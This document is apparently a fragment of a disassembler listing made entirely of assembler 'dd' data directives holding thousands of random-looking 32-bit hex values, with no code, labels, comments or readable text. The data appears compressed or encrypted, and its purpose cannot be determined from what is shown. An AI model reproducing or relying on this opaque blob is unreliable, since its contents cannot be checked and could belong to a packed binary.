dd 0A8E365FFh, 78098E52h, 35513118h, 8855272Bh, 27C036E8h
dd 0BF3E8E3Dh, 54EB6952h, 0A5C636D4h, 1270E3A5h, 41C1C08Ch
dd 0C3EC444Ah, 0F4431DA3h, 4FAFCE91h, 7B190325h, 0CA0F86A8h
dd 0A1DD6975h, 91802013h, 0DFF6D806h, 0B6798F58h, 83381ABBh
dd 0AF77F58Ch, 25DA2D7h, 704DC902h, 0BE8B8137h, 1F7DBBEFh
dd 11887D52h, 6447ACB9h, 0C8454242h, 30B10B55h, 0EE30803Ah
dd 946B9259h, 8EAA2460h, 74E86E69h, 4DE525B2h, 2D27A0D6h
dd 0D2B39116h, 4B1D64C7h, 7C112274h, 4F7A6D5Ah, 0A76A5E45h
dd 2B1572A1h, 83799261h, 0FC2F3194h, 5C2B87h, 0E7E6A34Eh
dd 2E364D8Dh, 2625FA07h, 90729D76h, 33C52C9Fh, 42F3FC13h
dd 2E7CAB26h, 7383D8E9h, 0CB9027A4h, 440BEC60h, 0A7CFB461h
dd 240F8CFh, 1FF3D985h, 0B8A48EFDh, 242C18F5h, 61694670h
dd 0BA4CD6CFh, 0C6F44C4Fh, 0E6416165h, 0CFBC8148h, 74B863E4h
dd 2CDA6D82h, 0F20459Ch, 9DCB1470h, 0B873DF1Fh, 0E9F33B9Fh
dd 4AB88BCh, 3B9F6F01h, 0EB7AF3AFh, 0C7F0773Ch, 7A5B5F80h
dd 6984557Ah, 0F0B6EFBDh, 2BF88B18h, 0B040ACBAh, 6A76C153h
dd 1AC510Dh, 5585A1E0h, 59F687A4h, 7A573E81h, 0DBD2E519h
dd 1396A667h, 0C2FAAE4Dh, 7CC04EE5h, 0E4CC6521h, 0E34728E4h
dd 0ADB370C2h, 0FD238CD9h, 0FF5706B7h, 7EE17D6Bh, 57125491h
dd 618B4BD0h, 0D545FF83h, 0A25BE25Ah, 2120BF68h, 0E6AC5487h
dd 5B5AA6A1h, 0F245E760h, 337DE223h, 0D3CF0F95h, 4EE83E05h
dd 4C5800DCh, 1FC53505h, 0E752538h, 8111DB2Fh, 0E5F804F7h
dd 4F8C38F8h, 9EF3B187h, 4FFAB8B9h, 435F0565h, 0A9431282h
dd 0EC1F58A7h, 4BD81FE9h, 4F70EFEAh, 4B17B162h, 105BB6C1h
dd 0A1134B17h, 5762FF2Dh, 45A95572h, 933CF2A9h, 14F61880h
dd 0AC4E3352h, 0B761B349h, 1BDAD5F4h, 0DDDA3F81h, 276DE194h
dd 47DBCD3Eh, 0B7D62601h, 0EBEA8F86h, 0C0FB68A9h, 64B37C98h
dd 22AC4486h, 0BB9A2493h, 0BC8EC994h, 7E0FCC09h, 0CD964C98h
dd 269E6C90h, 6150769Bh, 0ACE4F7D9h, 0FB93BDFDh, 896A9AFDh
dd 6635B959h, 2EB76522h, 1C2D9553h, 44BFF6CFh, 51304CC8h
dd 175C91F6h, 557DFE78h, 50E5993Ch, 0DD9E74A2h, 7773CC30h
dd 164E5CDAh, 0F9286494h, 5C671623h, 98174DE0h, 85A2498Ch
dd 1C349F4Ah, 0B151B7BDh, 9A338A66h, 0B98813C2h, 0BFBFAB46h
dd 754ABEE8h, 2F5EFAE3h, 860761F5h, 7FC4398h, 0D5D54023h
dd 132CDh, 95E6D574h, 0DBECF623h, 0F6C69F7Eh, 0E3825F2Dh
dd 33700560h, 860DDD3h, 1C61393Bh, 5CF8ACBEh, 53E7C7Ch
dd 804B9A56h, 0CDA83A75h, 62F6CC42h, 0CB0C120Bh, 0EF3F9CC4h
dd 94485A62h, 0DEB3614Eh, 0DB7FA85Fh, 7E54F8DBh, 93E9F41Fh
dd 0D21EC174h, 16065F2Ch, 0A7A71A43h, 0B02A4877h, 0CCEB19FDh
dd 3E4AA424h, 84BD6F69h, 2FF815B7h, 59DB4FDCh, 0F9C6F7CBh
dd 5370946Bh, 0A98D34D3h, 233F2EF0h, 71EA3E88h, 0D1D7BBD1h
dd 0F8C8DDB4h, 622DCEF6h, 307F6116h, 0DADB9AB3h, 22AB2B28h
dd 4C3CD9E0h, 0CC6C248h, 0DB17FDBDh, 0EAA2FE24h, 8E13F838h
dd 0D4FFB69Ch, 59A159FCh, 0D7F5B0B8h, 981BCA2h, 3E4F378Ch
dd 8EA3C78Ch, 8C24EDCFh, 0F7D06215h, 0CEFC77B5h, 5290BCC1h
dd 0F20CE341h, 397FF730h, 96B7F394h, 0F7FD5C3Eh, 9CEEE7EFh
dd 0DEC90C76h, 0CC55A94Eh, 593D3AACh, 2F6AFAA9h, 42E2C89Bh
dd 116D2874h, 8CD6782Bh, 0DA16B86Ch, 0C47640BCh, 646D6940h
dd 63A84B9h, 7214C5D0h, 0ECFDE85Ch, 21720B30h, 7C22E71Bh
dd 802B0E6Ch, 785DE98Fh, 1EAEDA6h, 0D8D1054Bh, 1F3C67DFh
dd 0ABC8299Ch, 171483F9h, 270AD784h, 232675DEh, 0DFB68746h
dd 0EAF94D83h, 8D8B5652h, 681061ABh, 0E6D4046Bh, 0D89E91D2h
dd 9F754C8Bh, 0EB2FF1CDh, 0B89C39DAh, 5943AED6h, 0C58481B8h
dd 310A057Dh, 123BED33h, 0F30462CFh, 8DD4C77Fh, 0D4A3059h
dd 75571FE3h, 63F53EB3h, 7B80D973h, 0F6FAE8C4h, 0EDAA0992h
dd 8BCB862Fh, 31FD2500h, 78B93D00h, 969A5D41h, 0A549DBFh
dd 0E03E83EEh, 0DCDA73D6h, 0E380BF48h, 6DE81708h, 96764957h
dd 2B77DFDh, 5738A8FEh, 0B3C178C3h, 67DB1996h, 3649A915h
dd 5D23CB5Ah, 0F06623FCh, 0E96BE86Fh, 0B332EA3Ch, 0EF98AFE0h
dd 0BE60A8F2h, 0C383DBD3h, 0F609879h, 0B01D612Eh, 0AB221856h
dd 961F4FE3h, 92173543h, 2EF3C728h, 0DF236F94h, 0A8DDE8EDh
dd 4644BC6Dh, 9FC6667Fh, 402663D5h, 3A88097Bh, 21B0B600h
dd 0EECE4DC2h, 2552D060h, 0BE379118h, 81BBA4Ah, 535C99E6h
dd 193EC298h, 6893F0Ch, 0D578524Ah, 0A46504F6h, 974C0C0Fh
dd 0D6D16190h, 93C503Eh, 7C4B33CCh, 30640339h, 6055394Fh
dd 1860550Ah, 1CE37FB6h, 51C74FB4h, 44BF5E92h, 3A72B29Dh
dd 0F0CE047Eh, 60C6015Ch, 81B2DCB6h, 120CBA02h, 1BAAAD28h
dd 74D25783h, 0D7A61BE5h, 7A41B29Eh, 7732893Bh, 3263D367h
dd 8BC39B87h, 29C05D57h, 7C29970Fh, 80CB5112h, 0DD33DFD6h
dd 5CC4089Fh, 26D9A8E2h, 142EFACDh, 8DA8A5DFh, 0EEE346C9h
dd 19629A56h, 0C4D7309Bh, 77E71C74h, 0C58B1043h, 7765DFBEh
dd 0DE320AEDh, 25E8F11Eh, 0A5F373E8h, 0F43C7613h, 8BDC425Fh
dd 1E3603F7h, 0ED08E212h, 74581E4Dh, 0B66CB01h, 0A8985CAEh
dd 5F0A6D58h, 0A37DC77Ah, 228BB7CDh, 3BF303C7h, 45FDBF6Fh
dd 40756B69h, 0C566A0E2h, 4D57FDA1h, 6DC37E50h, 8AF9A728h
dd 8760A953h, 0EE388AD1h, 63FA2FAh, 3354F0B6h, 41C30423h
dd 0AD06010h, 0EAD91C3Ah, 79763270h, 4183996Ch, 0F128B572h
dd 82167A4Eh, 9AE43EA3h, 62460785h, 0F2BD3FC7h, 0DA71A2B9h
dd 9555FC4h, 0C556F263h, 78B54159h, 2CF58413h, 9153F451h
dd 0CA72C122h, 24CE1B39h, 0F7F81957h, 362E907Fh, 0D3E29C90h
dd 0D3F1E02Bh, 66D94636h, 0EB1BD31Eh, 909CAC10h, 844EA64Bh
dd 3431B009h, 3E7B08Eh, 0B18764FDh, 0A307F77h, 0F1D57434h
dd 0C6F7F2DAh, 0E4BDFEA2h, 0B3157737h, 0DA9D42BDh, 1B0D0FBDh
dd 2C6BF18Ch, 0EC4257DAh, 12D10A6Dh, 7EFF170Ch, 0E886C8EEh
dd 88CE9738h, 6DFFE7D5h, 0C83A8AEDh, 0C3D79694h, 5B3C5AF4h
dd 12F83285h, 0D475339Fh
dd 8FEC4A71h, 0C3D88DCAh, 25ACC1A5h, 0BBB9E2A3h, 0A9E47715h
dd 1B7EBB56h, 0FC8E2FCCh, 7AA7D26Ch, 4664555Ch, 6A6661F5h
dd 0A4CED3E3h, 2E7C5048h, 6B402C45h, 38F723C6h, 604DA6D9h
dd 509E8066h, 0B0242133h, 63A629A2h, 82904DE7h, 0F07C02F3h
dd 933B2015h, 0E7C9FC6Eh, 389DCC9Bh, 97E7AA3Ah, 7F76A27Ch
dd 0C300A49Ch, 57EF6AB5h, 0F2AC697Ah, 77BCC011h, 810A8900h
dd 844D607h, 15916D1Fh, 0BD36F016h, 0F47D12B9h, 4A2B5630h
dd 3E1FF1F0h, 22867FE8h, 0F8B491A0h, 1E4F9A24h, 0D7374474h
dd 4F5B0E7Ch, 5AC7741Bh, 6940B177h, 23CE6411h, 0AC6A74FBh
dd 0A934DF6Ch, 9662E6ECh, 4E29E69Ch, 0F3E54670h, 0F0A8AEAAh
dd 20BAAE47h, 0F1CCFF59h, 6ACBB75Ch, 0B965035Ch, 1D705DAAh
dd 0EC855EFDh, 70C4C5FAh, 49C2CCBBh, 47A4EEECh, 76ACD7FBh
dd 0F16FEFB6h, 6B35638Dh, 0F6D01A75h, 0AFB53A80h, 7F754AB8h
dd 7C5578D1h, 37ACC11h, 81E60796h, 468F5BD3h, 0DD797ECCh
dd 6C2620AFh, 0C43ED217h, 0DA5B7EA6h, 1B4637F7h, 6C60FEF2h
dd 8C761EE5h, 4DB39611h, 286166Fh, 10CB1A0h, 279B2A3h
dd 9641B62Eh, 9BA4764Fh, 78F4756h, 0B24E3C24h, 0C6F93750h
dd 0F7A94C4h, 4CD0B2BEh, 0D774B657h, 0A2CAA222h, 2600AB46h
dd 7E75A021h, 0CDF418Eh, 0C70046D3h, 1B807AD7h, 0AC94F7FBh
dd 1844FAC1h, 0E0CC6723h, 82428A25h, 39160D4h, 15331193h
dd 0E116432Fh, 4DEBF3A5h, 25A722C1h, 0A5089D06h, 0E0D4692Eh
dd 79621190h, 0FB067E6Ah, 0F32EAA92h, 0C1C9B75Ah, 238B58E6h
dd 0FBB34E82h, 984635DFh, 0AC2FF652h, 7D8226E7h, 0B1028E92h
dd 0A1B58003h, 0BA5F482Ah, 0F144995Eh, 123A9C44h, 0AB445D2Fh
dd 0E77E0897h, 0BAE5D9EBh, 18795F3Ch, 0C274600Ah, 0DE51A431h
dd 0B653A127h, 721C373Eh, 0D3FD1C97h, 0C7C67B9Eh, 822A2AE1h
dd 101E962Fh, 318B7ECEh, 778B2B0Ch, 9C9D91ADh, 0B70D78B1h
dd 0AB0D9D2Ah, 0CE3C220Ch, 57CCA376h, 0C9DA308Ah, 0BC43C5A1h
dd 833CBAFAh, 0BC750C52h, 0D9E84F96h, 0DBBB0010h, 9484B6h
dd 0EC72129h, 4720C8B2h, 34C79B77h, 0D95D8A9Dh, 1183C733h
dd 0E411A2F2h, 0F3029E6Bh, 0A719C90Ch, 724BF9F3h, 0D4D2519Ch
dd 3070D383h, 0DE790A7Eh, 3F7127F5h, 0B4A7A974h, 99B6226h
dd 7A2B00B3h, 8281FF57h, 44B02FC5h, 0F34229E1h, 41FC70CCh
dd 82898B87h, 197AC7B1h, 26DE2A3Dh, 732CA2A8h, 0DFED7D6Bh
dd 0ED5590C4h, 0C66AD79Ah, 0E2BE9548h, 1F237CC0h, 0D3552C4Eh
dd 0E17303E6h, 0B25AF739h, 2DAF3BC0h, 6E1084D1h, 696E8F6Eh
dd 0D0597FE7h, 11B4D507h, 0E014D20Bh, 9A05289Eh, 97F4CABFh
dd 4EAA7B5Dh, 0FFBA80CEh, 7622AA73h, 0F859CA32h, 0ED58A379h
dd 5F3EAFA8h, 0A6408FB2h, 0D6360AF4h, 34F1DE21h, 838DC5B8h
dd 1DB61FE6h, 384781CAh, 0F9CE8286h, 19E45788h, 0D342D1BAh
dd 0E12B724Fh, 10EBBC04h, 0BAB9D331h, 9BE8B3EAh, 7BB4926Ah
dd 9CCEFD4Fh, 6F005015h, 0D20DB872h, 156FD9C6h, 350A1F81h
dd 0E1E70018h, 0F425F201h, 0C50D4AC2h, 0FC3B63A2h, 0AE77E265h
dd 0F0AF3A0Ch, 4C31D12h, 0D0C95613h, 67CEA1FEh, 0DEF9FAA9h
dd 6DB741D9h, 0E0839F3Dh, 0C20CCDB3h, 0C59A65ABh, 9C43ADCFh
dd 7C31B59Dh, 4EFD19DEh, 389706D9h, 49EFDF82h, 0E85D07C0h
dd 0C32343EDh, 14F081D7h, 8446493Ch, 7FA61A46h, 0C60E1A42h
dd 12E89B20h, 0EF1F973Eh, 91AE4A8Bh, 6E6A93DCh, 6815369Fh
dd 0DB2390EEh, 5B51B70Fh, 0A2687FC1h, 2D025BC3h, 0B8992E9h
dd 0FE1BF128h, 185529DCh, 34534558h, 10952EBCh, 0A0E4DF7Ch
dd 7D769426h, 0A54DCBA4h, 0C95FCB5Ah, 5BE4493Ch, 11E546C0h
dd 0D3502723h, 0CEC226Ah, 0A9CFFF82h, 88A5A71Ah, 604290D2h
dd 0CC9E2FB3h, 801AA7C6h, 0E7A5AC19h, 0F740C048h, 0AF783E74h
dd 0BC7F0C31h, 91268EEBh, 28D3D8DCh, 5CA56C1Fh, 22738AFh
dd 922218C1h, 46B4E5B6h, 2D4E951Fh, 1ADCFFC7h, 816A4D4Eh
dd 345F8610h, 0E64F81h, 81EBE4E9h, 46F92F84h, 9DF41346h
dd 6FC29F46h, 76E783FCh, 3BFA7848h, 5E3D522Eh, 403C601Fh
dd 0B34357C4h, 7DDCEA90h, 7CA0CBF0h, 6F2D059Ah, 0B39E0193h
dd 0CA50C1E4h, 0EEDB841Fh, 52B7BAB0h, 0D2200A37h, 0FE059BC3h
dd 972BBD43h, 0F7C5BCD2h, 6041A919h, 0FB2AD587h, 0E5700726h
dd 6AE4CB6Fh, 0C0E12007h, 0DDDE2981h, 0FEA6B2B8h, 85A21D5Fh
dd 31EF128Dh, 848A22E7h, 20689DEDh, 3BD5F065h, 0B91FFC46h
dd 0F795DE6h, 13B6C98Eh, 8167D6F6h, 0AB7DCBADh, 0B25B4486h
dd 9C95BCC2h, 8D53670Dh, 550F84BDh, 0B98BC72Ch, 0BC327486h
dd 0E816B5CCh, 3F8B5BC7h, 0B5CF274Fh, 77ECB8EAh, 2BE68205h
dd 96F593DAh, 903AC1B3h, 79303F2Bh, 0AEA0D0DDh, 85FD6837h
dd 0F941E837h, 0A71ECCAAh, 72E04FC0h, 0B9547DAh, 16D66515h
dd 0F2C883C0h, 80D3F255h, 0E3EDA7ECh, 1BAF739Bh, 611F0224h
dd 49C98E47h, 0B4FE0434h, 0E23D391Bh, 0E1AE2ACDh, 0AE3E51Dh
dd 0E17F0FFCh, 45284E91h, 4090A20Ch, 6722E64Dh, 8865833Ah
dd 661E4AE7h, 1A0FC500h, 6BC2E558h, 387AAF97h, 46F0566Dh
dd 4095EC82h, 88D83D06h, 0DAE7E450h, 0D33A1AC9h, 47DF94EBh
dd 0FA556283h, 9B344149h, 0AE937E8Dh, 3A09F5E5h, 96219678h
dd 0DDE8F553h, 23FE2385h, 417E83C4h, 0E80FE8EEh, 0B223C370h
dd 47A7CE6Ch, 0A0B84F76h, 0B71A5EBDh, 7493A61Fh, 0C63D3856h
dd 0EFCFD0A6h, 0E2B743B0h, 5569F660h, 21E5CD77h, 4CD2DFE8h
dd 9942510Ch, 0BEB4C905h, 6C8DF81Ch, 417E42E7h, 2B849DAh
dd 0EF12A031h, 0E09DA378h, 180C448Ch, 3210C8FCh, 198E5408h
dd 7EEE1CFBh, 29463945h, 0FDC07F68h, 2D08C70Bh, 35B0EB56h
dd 0CFB6C1B3h, 86D12917h, 4A97C863h, 55EFF790h, 0AFF2B36h
dd 91A441AAh, 45221FEBh, 4FB6EC13h, 304AE0C2h, 199EB183h
dd 497673C1h, 9C1999D7h, 271D40C2h, 0A4C042A3h, 346616AFh
dd 0E622B1EBh, 7B6D79A1h, 3AE81156h, 40B6F7F4h, 7CD91F63h
dd 72002973h, 0CFDDE203h, 0E53846D8h, 45C5EA81h, 2B54CC28h
dd 9EACB2C0h, 37052046h, 27164F5Ah, 6819CD04h, 4A467315h
dd 8CFD6B5Dh, 0D683FB9Ch, 0D871A52Fh, 399EAA47h, 1241DE52h
dd 0AC75A5h, 2F976ADBh, 0C59691D6h, 6AEC2F2Dh, 1416015Dh
dd 0BF2CE44Ch, 8D379A9Ah, 66875DEBh, 0CEA2F140h, 0A80D5E5Dh
dd 0BB921B75h, 16299E64h, 0DF78BACFh, 0A4B99E59h, 9DF9A024h
dd 0EBA98FE7h, 0D1568717h, 9C27A2CEh, 922C4A48h, 1E5DDED4h
dd 30B27B7Ah, 701765CEh, 0FC5953A8h, 826DAE5Ch, 8C272291h
dd 57E842A7h, 0B6FF696h, 9B818B48h, 3B837A56h, 540A764Dh
dd 961B5975h, 0DBEE809Ah, 2A5F26C2h, 51E9FF88h, 1FF67AC0h
dd 0F2B76B88h, 12EDAACFh, 2E22D680h, 3F3B596Dh, 0EE08F037h
dd 2A65B047h, 9477A8A4h, 0FE82929h, 10CA54B4h, 0EB8F8ECh
dd 8E9F41D9h, 0F9C3149h, 0E476B82Ch, 6DF9B9BBh, 585D3FD0h
dd 4B358DA3h, 931EF4A7h, 0AE352053h, 32B2DB42h, 0EAD4066Dh
dd 340C4FECh, 9969178Bh, 0E8272D3h, 3EA4D591h, 5D07D0Ch
dd 6ECA035Fh, 378D2640h, 0CDBD4F98h, 445776F3h, 1CE3CA6h
dd 209FD580h, 397F4349h, 0A95BFB03h, 1AAFB268h, 9C354D37h
dd 7D64C302h, 10FD9628h, 0BD077751h, 0D80554DAh, 19E7A55Bh
dd 54241D89h, 4CEFE147h, 2BE75869h, 74F89552h, 47B84C1Fh
dd 0F7894C49h, 9BF50862h
dd 0FB9E591Fh, 9A65C598h, 1EC29527h, 3F3D4CDh, 4C5A5041h
dd 0C14E486Fh, 0AEEBEA84h, 204D110Dh, 0C3F4E828h, 1A81A11Ch
dd 56E06745h, 6FD257F0h, 8403AFAAh, 91D969Bh, 7AE17486h
dd 351D52EDh, 62EC77Bh, 43C11385h, 0CA2089Ch, 0E4F0F367h
dd 2C13B748h, 1AF273A8h, 0EF112991h, 1B43183Ah, 34B45665h
dd 0ED450BA5h, 3F0DFFC1h, 77F8BAA2h, 0EAF07ECAh, 548407F9h
dd 0CB06C952h, 2D4B5AAh, 0BC812F0Ah, 4A3AB9C2h, 8E812ECCh
dd 0ED014D4Bh, 0CAFE5240h, 859AE71h, 0CD7836E1h, 1AC2A855h
dd 7974E922h, 174E50D2h, 7151D600h, 0D470E28Dh, 0D9CFFF05h
dd 8DAE9E43h, 0C9E7A29Bh, 0BABCAFDFh, 9914BE72h, 0F3201114h
dd 4F011E8Bh, 0C4250495h, 0AD2A7A5Ch, 96A99118h, 71BB8AC0h
dd 3465BA58h, 0AB24F8A7h, 4570B03Dh, 0A05C742Fh, 0F6A8C078h
dd 242329D0h, 0EBF34F07h, 925170D1h, 65372896h, 32F201EDh
dd 0B0B28E03h, 60706A0Ah, 38A06DA3h, 0D68527E1h, 5C9D0838h
dd 1534A814h, 3A127D94h, 0AE5F158Ah, 0A6A1411Dh, 0F725089Ah
dd 0DBEE0DD9h, 5C06370Dh, 3FD01921h, 0F8423429h, 251864AEh
dd 0A851BCE5h, 0F341B8C6h, 0BE7212C2h, 6E6ABA7Eh, 722AF91h
dd 6CF70D9Ah, 0CFDAA9E8h, 5F641C4Fh, 5060DAD9h, 0A6CAD648h
dd 11E2A71Dh, 2C443FC0h, 0E36170F9h, 351BBB2Ch, 128D7EC6h
dd 8CE47D2Ch, 5278D38Ch, 3A86830Dh, 32BFD29Bh, 2A314093h
dd 2EC9390h, 25AF9A6Dh, 90504AEDh, 882174B0h, 0AFED2E50h
dd 0DDCAC049h, 0FE95EBFFh, 13947C9Ah, 58685B2Fh, 0E89691B3h
dd 0B2F72F86h, 4B741EDAh, 272DC1D2h, 0CFA4E20Ch, 0E78B70Eh
dd 0F41389F8h, 2891CFB9h, 0C6A18F63h, 0A2825341h, 0D63A6C30h
dd 2CB27DA5h, 304B0CCEh, 0F8FF0856h, 3B0ED6CAh, 0FBBA56F3h
dd 16C6BAD7h, 7696ACC3h, 0A1BBAC28h, 40F2FC4Bh, 4463B3F4h
dd 1B45508Bh, 8F784FDEh, 22B33DF5h, 0FDF985F8h, 0BA0ED31Ah
dd 0A63510CFh, 0BBFF29AEh, 7B76C934h, 780ED650h, 91854627h
dd 2C11F33Eh, 0AB257E77h, 9E77D516h, 2895F63Dh, 0CCEDD213h
dd 0EABC5A96h, 0CE19E8FDh, 0F6D8457Fh, 9C063024h, 9413C234h
dd 0E40AE9CBh, 47B30DE7h, 0CC06ACh, 0FFBBF7F1h, 66C6024Fh
dd 4B06F973h, 0D7E5E35Eh, 534F66B9h, 490C4163h, 0B4426A83h
dd 762F9BB0h, 17E051B2h, 5679D6DCh, 0C9250621h, 0BBC38734h
dd 0FBB0AD96h, 0C0ABF862h, 7D3DA38Bh, 0BA28B430h, 7F40AE12h
dd 211A885Eh, 0C8A1C5D9h, 0B8485C10h, 6CF35723h, 0FFBBB2CDh
dd 4B1E71FDh, 15DC4BADh, 23C086Fh, 4B610505h, 0F87A0E1Ah
dd 51AC9487h, 36D5FE64h, 689398DEh, 48AFEFD3h, 3B2073Eh
dd 0C6171ED5h, 49768BBh, 0F3BBFC08h, 0D80E1184h, 68AC1C97h
dd 26BB2AAFh, 0CB2453ACh, 6DA00474h, 0D59F89F4h, 6219E550h
dd 8CEB1FC2h, 0AC0D8269h, 0F782B2F2h, 0D66DF4CDh, 0E57E8C70h
dd 86C1138Eh, 0C9B04F9Ch, 0B66AE54Dh, 0A486C38Ah, 99499F3Dh
dd 77462D58h, 471F22Ah, 24556180h, 0A238DAA3h, 0A618DA82h
dd 0C3B84E02h, 0E7916B71h, 0AF120301h, 5D5B7FE4h, 77FFF262h
dd 0B6E42604h, 0EB1D32AAh, 96ACBD94h, 159EBB8h, 3884E215h
dd 574FC539h, 0A2C0A445h, 9CFA2553h, 1ED26AAFh, 245B4DA0h
dd 6F3E68ABh, 0DE2DA337h, 30A0FC06h, 0BF32C20Fh, 7A360D6Ch
dd 0EDF593CAh, 0CAC6F94Ah, 0E150BC78h, 3DCA41AFh, 0EDFAFBD2h
dd 3B18E706h, 55FF82F3h, 0B01DFFDh, 92D9EC2h, 764FA188h
dd 909DA1D1h, 0C6481E50h, 0AC4A7479h, 4F3CDB9h, 1EFB0587h
dd 0E232B35Bh, 6103C6CCh, 69C991ADh, 6F763EE6h, 68FCA869h
dd 0F898A3F4h, 2E3D02E7h, 8EF0E55h, 0D1440CD5h, 0E187567Fh
dd 1E7B0CC9h, 0F121F7EEh, 0E0E5DBF4h, 9F7994D0h, 0E476A00Fh
dd 7C79E2F0h, 23D5AA31h, 0F3DFADECh, 0D4FBCA18h, 0C7AD58A8h
dd 7A18DC21h, 0B6DA8035h, 0D923BD65h, 0B504C0DEh, 87572F67h
dd 9D890BE9h, 18FC0DCCh, 0EAFBF21Ah, 0F83E772Eh, 0F2E6601Eh
dd 585E9B73h, 8A6C2FBDh, 9A54C2h, 5B3D603h, 3CD5AE11h
dd 5B097C9Bh, 0B8BB0AFCh, 6646933Bh, 670601F8h, 4CDB5183h
dd 295736A4h, 4F360DE6h, 4F34E557h, 920F0CB9h, 6D484475h
dd 0EE04BA7Bh, 0AAA7888Fh, 2D4C7D32h, 695593C7h, 0D8DDB8AEh
dd 49B22A14h, 0E48DC039h, 8670CCB4h, 0E716AE5Ch, 0AED25C48h
dd 0BE8825A5h, 679909F3h, 0B05B5156h, 0CA3E73E8h, 76DDA5BCh
dd 9CC112B8h, 0F454C7A0h, 0B164EBFBh, 0B151062Ah, 9BCDB262h
dd 12DE6DA0h, 0F14D1A56h, 4A263804h, 143AE325h, 22B39DFFh
dd 0C2263A1Eh, 10CC410Eh, 0C7CAFFBEh, 8B511ED8h, 1696BC7Bh
dd 0E83FB68Ch, 0F21DBA39h, 6891C2FBh, 280975A6h, 0E1513189h
dd 0F3AA7EEh, 60A696F1h, 0E39B7103h, 0A544FB69h, 0FAFBCEA1h
dd 0CF093A3Ch, 348A28h, 1C0D45D1h, 0C0B4DBACh, 462A1DAh
dd 0C794921h, 59F2FE99h, 2890B6CFh, 0C71505D2h, 859BF3D9h
dd 1960FA23h, 100A5511h, 646B0FD4h, 15F199EFh, 598E1DDDh
dd 0A27C4Bh, 116E77DBh, 446C2DA8h, 5866BB0Eh, 0DEFEC276h
dd 0CF2253F4h, 162AD8EBh, 0B63C8B6h, 6507377h, 871AC31Ah
dd 670E3ADEh, 0A1E940F1h, 8DEE829h, 1883B834h, 8E1970CCh
dd 0CFD112F4h, 3D8D348Ch, 434CB17Dh, 1EDAC741h, 31AC30F7h
dd 0B41A8201h, 5BC84A05h, 0C878C829h, 4E5A1D3Bh, 7B589EE1h
dd 624D7502h, 0DD358EDh, 0C3CA5546h, 0B76E261h, 7241BCBBh
dd 287A3108h, 0CA96AA84h, 0DD8888D0h, 3C5A479Dh, 0B977E2B5h
dd 915B2710h, 0FEF7F70Bh, 8787070Ah, 0D599E74Fh, 0EEE720BBh
dd 4AB1336Dh, 2232035Dh, 5DC2BC1Ah, 3561A892h, 0EAD6C0D0h
dd 4D90472Ch, 0FC570583h, 0D6B9847h, 0FF24B6FBh, 2EE1BCA7h
dd 2D060B51h, 0C790B6D9h, 211EF86Fh, 26EC85BCh, 24044D4h
dd 0E6E882Ah, 0C7D49A8Eh, 8D690D18h, 1CE6C2C3h, 0F841087Dh
dd 4E74E8FCh, 3531315Ah, 0CD09B23Dh, 80804D8Ah, 3F0A36EBh
dd 8BE29C0Dh, 42A0F0DBh, 0BF6D1988h, 95C3057Bh, 595C674Fh
dd 50CC2E53h, 85436A8Eh, 97D4074Fh, 6CD53338h, 78B6FC43h
dd 992744D2h, 59FB7B37h, 8A9622B1h, 0BE4B7485h, 26782B31h
dd 9442A7E6h, 0A53B3A34h, 0EDB684A4h, 97C6BFBBh, 0C311131Ch
dd 0B6C5C9D9h, 0BD335B75h, 0ABCF8887h, 160A3440h, 9D84AC9Bh
dd 71B5C865h, 12DB777Ch, 0D61844BEh, 50EF8B8Ch, 21D8CC44h
dd 86584F97h, 92B552DBh, 5599F17Dh, 0E857F14Fh, 0AD9E2E2Bh
dd 0CC5132D6h, 104268D0h, 0C9EE77F5h, 66C225D0h, 0E1D1E6C7h
dd 5B55A36Fh, 36838709h, 24005296h, 0EB263A0Dh, 1F8AC967h
dd 0D9F8D43Bh, 0A4E2F3C4h, 3E0B512Bh, 4BD4A822h, 0B86AAC62h
dd 5A842A99h, 0EFC9074Eh, 5EAB7290h, 81B96291h, 0F9013A96h
dd 9D35E02Eh, 0DA81A03Fh, 2CE86A66h, 2C5C3335h, 2918315Dh
dd 407DA95Ah, 27D1549Dh, 0FB0B9307h, 1867CF5Eh, 90972A8Bh
dd 850E80E2h, 0C4B16045h, 70992DE2h, 89CE50D6h, 18E9FA46h
dd 91E6BA80h, 7A0C0B87h, 0A2912593h, 78ED4CE3h, 691C3503h
dd 7DB22536h, 0CA56A0A2h, 7C9EA51Ch, 0E040C0E5h, 2F1A266Ah
dd 0F002634Ah, 0BE909459h, 8BF870B7h, 0A9E8FE90h, 4EAC7FC9h
dd 0EB903D75h, 8847F0E0h, 5E329D9Ch, 54EBF792h, 82CDB3E9h
dd 0D6B0BD4Bh, 0E2D4422Fh, 67B4D22Fh, 0B9B30356h, 89F1CE99h
dd 0E206C524h, 1A8011BBh, 6BF3C5B0h, 0B3CB7D1Fh, 9454D75Dh
dd 271860BFh, 0DDD4A5E7h
dd 29EB722Eh, 70D19DD5h, 0B6037F3Ah, 3B2EACA2h, 72B1E7D0h
dd 5A3E091Eh, 0ED4E097Ch, 582F4C7Eh, 30CC0466h, 0D2F48C8Ch
dd 5C453669h, 2DDAA29Bh, 1AAB7E13h, 1FC5F19Ah, 224DF135h
dd 1AEA019Ch, 6AEFD63h, 0E6263CA9h, 0AE3AAC90h, 0F8BC95B3h
dd 61146F15h, 5FAA0B4h, 81467FC5h, 0B1D24F09h, 0C038C423h
dd 201548B7h, 0A404E972h, 0A23FBC18h, 23A18264h, 0C7D7AF79h
dd 0AE4FFBB9h, 0D8B1BBD3h, 524B242Bh, 48F8FC1Fh, 917DEB3Bh
dd 336E1794h, 8416B449h, 0A3324317h, 2D8A0603h, 0E08675FEh
dd 2FA2B4D1h, 2BCEE849h, 77161A3Fh, 2E10CB59h, 0AB3FB3EDh
dd 84C4DFB9h, 98EA8F2Fh, 7A45E7BAh, 9A4BA089h, 54B2C87Ch
dd 348AFC5Bh, 936943D1h, 144A1A60h, 0F15495DDh, 0D3691D89h
dd 63972615h, 8F0242D1h, 0D8866C3Dh, 944409F5h, 8417A011h
dd 0A72F4503h, 1F04DA08h, 0F0BA5E13h, 7D6C0C30h, 1577D8BCh
dd 675828BAh, 0F095532Fh, 0F30FC08Ch, 90FD33A6h, 64B8C067h
dd 308A887Ah, 2068A85Ch, 0A1E288FBh, 0EE2D5679h, 261330A0h
dd 4BDA39A9h, 87E0FA8Dh, 9B823693h, 0E71F314Ah, 8CC00030h
dd 99B141EEh, 26D0DE44h, 7E0E19E6h, 0FF7D4AA7h, 79CDFAE6h
dd 0A6D96522h, 54CF2BABh, 73B65B95h, 0B72D5923h, 81F2A842h
dd 0D4148FFFh, 0A8D40AB9h, 1374E39Ch, 45F94610h, 177F137Bh
